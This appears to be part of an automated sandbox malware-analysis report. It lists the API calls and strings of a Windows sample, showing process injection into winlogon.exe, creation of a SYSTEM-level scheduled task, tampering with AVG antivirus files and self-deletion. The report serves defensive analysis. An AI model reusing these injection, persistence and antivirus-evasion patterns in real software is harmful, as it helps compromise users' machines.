                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: VUUU
                                                                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
